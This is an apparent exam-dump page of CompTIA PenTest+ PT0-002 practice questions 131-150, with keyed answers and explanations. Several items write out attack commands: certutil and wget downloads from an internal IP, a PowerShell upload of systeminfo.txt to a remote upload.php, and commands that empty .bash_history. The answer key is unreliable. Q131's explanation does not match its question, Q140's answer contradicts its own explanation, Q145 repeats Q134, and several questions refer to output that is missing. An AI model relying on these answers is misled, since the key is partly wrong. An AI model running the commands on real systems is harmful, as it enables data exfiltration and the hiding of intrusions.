[Q131-Q150] Real Exam Questions PT0-002 Dumps Exam Questions in here [Mar-2025]

Real Exam Questions PT0-002 Dumps Exam Questions in here [Mar-2025]

Get Latest Mar-2025 Conduct effective penetration tests using PT0-002

NEW QUESTION # 131
After running the enum4linux.pl command, a penetration tester received the following output:

Which of the following commands should the penetration tester run NEXT?

• A. net rpc share -S 192.168.100.56 -U ''
• B. smbspool //192.160.100.56/print$
• C. smbget //192.168.100.56/web -U ''
• D. smbclient //192.168.100.56/web -U '' -N

Answer: D

Explanation:
A vulnerability scan is a type of assessment that helps to identify vulnerabilities in a network or system. It scans systems for potential vulnerabilities, misconfigurations, and outdated software. Based on the output from a vulnerability scan, a penetration tester can identify vulnerabilities that may be exploited to gain access to a system. In this scenario, the output from the penetration testing tool shows that 100 hosts contained findings due to improper patch management. This indicates that the vulnerability scan detected vulnerabilities that could have been prevented through proper patch management. Therefore, the most likely test performed by the penetration tester is a vulnerability scan.

NEW QUESTION # 132
A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations. Which of the following are considered passive reconnaissance tools? (Choose two.)

• A. Nikto
• B. Retina
• C. Wireshark
• D. Burp Suite
• E. Nessus
• F. Shodan

Answer: C,F

Explanation:
Wireshark and Shodan are two tools that can be used to perform passive reconnaissance, which means collecting information from publicly available sources without interacting with the target or revealing one's identity. Wireshark is a tool that can be used to capture and analyze network traffic, such as packets, protocols, or sessions, without sending any data to the target. Shodan is a tool that can be used to search for devices or services on the internet, such as web servers, routers, cameras, or firewalls, without contacting them directly.
The other tools are not passive reconnaissance tools, but rather active reconnaissance tools, which means interacting with the target or sending data to it. Nessus and Retina are tools that can be used to perform vulnerability scanning, which involves sending probes or requests to the target and analyzing its responses for potential weaknesses. Burp Suite is a tool that can be used to perform web application testing, which involves intercepting and modifying web requests and responses between the browser and the server.
Reference: https://resources.infosecinstitute.com/topic/top-10-network-recon-tools/

NEW QUESTION # 133
Which of the following tools provides Python classes for interacting with network protocols?

• A. PowerSploit
• B. Impacket
• C. Empire
• D. Responder

Answer: B

Explanation:
Explanation
Impacket is a tool that provides Python classes for interacting with network protocols, such as SMB, DCE/RPC, LDAP, Kerberos, etc. Impacket can be used for network analysis, packet manipulation, authentication spoofing, credential dumping, lateral movement, and remote execution.

NEW QUESTION # 134
After gaining access to a Linux system with a non-privileged account, a penetration tester identifies the following file:

Which of the following actions should the tester perform FIRST?

• A. Change the file permissions.
• B. Cover tracks.
• C. Use privilege escalation.
• D. Start a reverse shell.

Answer: C

Explanation:
Explanation
The file .scripts/daily_log_backup.sh has permissions set to 777, meaning that anyone can read, write, or execute the file. Since it's owned by the root user and the penetration tester has access to the system with a non-privileged account, this could be a potential avenue for privilege escalation. In a penetration test, after finding such a file, the tester would likely want to explore it and see if it can be leveraged to gain higher privileges. This is often done by inserting malicious code or commands into the script if it's being executed with higher privileges, such as root in this case.

NEW QUESTION # 135
Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?

• A. chmod o+e script.sh
• B. chmod o+x script.sh
• C. chmod u+x script.sh
• D. chmod u+e script.sh

Answer: C

Explanation:
Reference: https://newbedev.com/chmod-u-x-versus-chmod-x

NEW QUESTION # 136
A penetration tester is assessing a wireless network. Although monitoring the correct channel and SSID, the tester is unable to capture a handshake between the clients and the AP. Which of the following attacks is the MOST effective to allow the penetration tester to capture a handshake?

• A. Replay
• B. Key reinstallation
• C. Evil twin
• D. Deauthentication

Answer: D

Explanation:
Deauth will make the client connect again

NEW QUESTION # 137
During an engagement, a penetration tester found the following list of strings inside a file:

Which of the following is the BEST technique to determine the known plaintext of the strings?

• A. Credential-stuffing attack
• B. Brute-force attack
• C. Dictionary attack
• D. Rainbow table attack

Answer: D

NEW QUESTION # 138
A compliance-based penetration test is primarily concerned with:

• A. bypassing protection on edge devices.
• B. obtaining Pll from the protected network.
• C. determining the efficacy of a specific set of security standards.
• D. obtaining specific information from the protected network.

Answer: C

NEW QUESTION # 139
A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment. Which of the following could be used for a denial-of-service attack on the network segment?

• A. Smurf
• B. Ping flood
• C. Fraggle
• D. Ping of death

Answer: C

Explanation:
Fraggle attack is same as a Smurf attack but rather than ICMP, UDP protocol is used. The prevention of these attacks is almost identical to Fraggle attack.
Ref: https://www.okta.com/identity-101/fraggle-attack/

NEW QUESTION # 140
An assessment has been completed, and all reports and evidence have been turned over to the client. Which of the following should be done NEXT to ensure the confidentiality of the client's information?

• A. Publish the findings after the client reviews the report
• B. Report any findings to regulatory oversight groups
• C. Encrypt and store any client information for future analysis
• D. Follow the established data retention and destruction process

Answer: C

Explanation:
After completing an assessment and providing the report and evidence to the client, it is important to follow the established data retention and destruction process to ensure the confidentiality of the client's information. This process typically involves securely deleting or destroying any data collected during the assessment that is no longer needed, and securely storing any data that needs to be retained. This helps to prevent unauthorized access to the client's information and protects the client's confidentiality.
Reporting any findings to regulatory oversight groups may be necessary in some cases, but it should be done only with the client's permission and in accordance with any relevant legal requirements. Publishing the findings before the client has reviewed the report is also not recommended, as it may breach the client's confidentiality and damage their reputation. Encrypting and storing client information for future analysis is also not recommended unless it is necessary and in compliance with any legal or ethical requirements.

NEW QUESTION # 141
A penetration tester downloaded a Java application file from a compromised web server and identifies how to invoke it by looking at the following log:

Which of the following is the order of steps the penetration tester needs to follow to validate whether the Java application uses encryption over sockets?

• A. Disassemble the binary code and then identify the break points.
• B. Start a packet capture with Wireshark and then run the application.
• C. Run an application vulnerability scan and then identify the TCP ports used by the application.
• D. Run the application attached to a debugger and then review the application's log.

Answer: B

NEW QUESTION # 142
The results of an Nmap scan are as follows:

Which of the following would be the BEST conclusion about this device?

• A. This device may be vulnerable to the Heartbleed bug due to the way transactions over TCP/22 handle heartbeat extension packets, allowing attackers to obtain sensitive information from process memory.
• B. This device is most likely a proxy server forwarding requests over TCP/443.
• C. This device may be vulnerable to remote code execution because of a butter overflow vulnerability in the method used to extract DNS names from packets prior to DNSSEC validation.
• D. This device is most likely a gateway with in-band management services.

Answer: D

Explanation:
The heart bleed bug is an open ssl bug which does not affect SSH Ref:
https://www.sos-berlin.com/en/news-heartbleed-bug-does-not-affect-jobscheduler-or-ssh

NEW QUESTION # 143
A penetration tester gives the following command to a systems administrator to execute on one of the target servers:
rm -f /var/www/html/G679h32gYu.php
Which of the following BEST explains why the penetration tester wants this command executed?

• A. To delete credentials the tester created
• B. To trick the systems administrator into installing a rootkit
• C. To close down a reverse shell
• D. To remove a web shell after the penetration test

Answer: D

Explanation:
A web shell is a malicious script that allows remote access and control of a web server. A penetration tester may use a web shell to execute commands on the target server during a penetration test. However, after the test is completed, the penetration tester should remove the web shell to avoid leaving any traces or backdoors on the server. The command rm -f /var/www/html/G679h32gYu.php deletes the file G679h32gYu.php from the web server's document root directory, which is likely the location of the web shell. The other options are not plausible explanations for why the penetration tester wants this command executed.

NEW QUESTION # 144
A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?

• A. certutil -urlcache -split -f http://192.168.2.124/windows-binaries/ accesschk64.exe
• B. schtasks /query /fo LIST /v | find /I "Next Run Time:"
• C. wget http://192.168.2.124/windows-binaries/accesschk64.exe -O accesschk64.exe
• D. powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.2.124/ upload.php', 'systeminfo.txt')

Answer: A

Explanation:
Explanation
https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while
--- https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk

NEW QUESTION # 145
After gaining access to a Linux system with a non-privileged account, a penetration tester identifies the following file:

Which of the following actions should the tester perform FIRST?

• A. Change the file permissions.
• B. Cover tracks.
• C. Use privilege escalation.
• D. Start a reverse shell.

Answer: C

Explanation:
The file .scripts/daily_log_backup.sh has permissions set to 777, meaning that anyone can read, write, or execute the file. Since it's owned by the root user and the penetration tester has access to the system with a non-privileged account, this could be a potential avenue for privilege escalation. In a penetration test, after finding such a file, the tester would likely want to explore it and see if it can be leveraged to gain higher privileges. This is often done by inserting malicious code or commands into the script if it's being executed with higher privileges, such as root in this case.

NEW QUESTION # 146
A penetration tester gains access to a system and establishes persistence, and then runs the following commands:
cat /dev/null > temp
touch -r .bash_history temp
mv temp .bash_history
Which of the following actions is the tester MOST likely performing?

• A. Covering tracks by clearing the Bash history
• B. Making a copy of the user's Bash history for further enumeration
• C. Making decoy files on the system to confuse incident responders
• D. Redirecting Bash history to /dev/null

Answer: A

Explanation:
The commands are used to clear the Bash history file of the current user, which records the commands entered in the terminal. The first command redirects /dev/null (a special file that discards any data written to it) to temp, which creates an empty file named temp. The second command changes the timestamp of temp to match that of .bash_history (the hidden file that stores the Bash history). The third command renames temp to
.bash_history, which overwrites the original file with an empty one. This effectively erases any trace of the commands executed by the user.
Reference: https://null-byte.wonderhowto.com/how-to/clear-logs-bash-history-hacked-linux-systems-cover- your-tracks-remain-undetected-0244768/

NEW QUESTION # 147
A penetration tester, who is doing an assessment, discovers an administrator has been exfiltrating proprietary company information. The administrator offers to pay the tester to keep quiet. Which of the following is the BEST action for the tester to take?

• A. Escalate the issue.
• B. Stop the penetration test.
• C. Include the discovery and interaction in the daily report.
• D. Check the scoping document to determine if exfiltration is within scope.

Answer: C

NEW QUESTION # 148
An Nmap scan of a network switch reveals the following:

Which of the following technical controls will most likely be the FIRST recommendation for this device?

• A. Multifactor authentication
• B. System-hardening techniques
• C. Network segmentation
• D. Encrypted passwords

Answer: B

NEW QUESTION # 149
A security firm has been hired to perform an external penetration test against a company. The only information the firm received was the company name. Which of the following passive reconnaissance approaches would be MOST likely to yield positive initial results?

• A. Scrape web presences and social-networking sites.
• B. Specially craft and deploy phishing emails to key company leaders.
• C. Run a vulnerability scan against the company's external website.
• D. Runtime the company's vendor/supply chain.

Answer: A

NEW QUESTION # 150
......

CompTIA PT0-002 (CompTIA PenTest+ Certification) exam is a performance-based certification that tests an individual's skills in conducting penetration testing and vulnerability assessments. CompTIA PenTest+ Certification certification validates the skills required for a cybersecurity practitioner to conduct a successful penetration testing and vulnerability assessment in a live environment. CompTIA PenTest+ Certification certification also validates the knowledge to manage engagements and report on findings.

Earning a CompTIA PenTest+ certification helps the professionals to demonstrate their understanding and command of the emerging penetration testing tools, techniques, and best practices. It is also reviewed and backed by trusted organizations and used in real-world applications to protect businesses and establishments. CompTIA PenTest+ Certification certification allows cybersecurity professionals a chance to develop their proficiency in maximum ethical penetration testing and land a prestigious job in a highly dynamic industry.

 

Authentic Best resources for PT0-002 Online Practice Exam: https://www.realvce.com/PT0-002_free-dumps.html

Get the superior quality PT0-002 Dumps with explanations waiting just for you, get it now: https://drive.google.com/open?id=1seT2-wi8QPRsTtaJ9kB2oDlA7WN4JaMn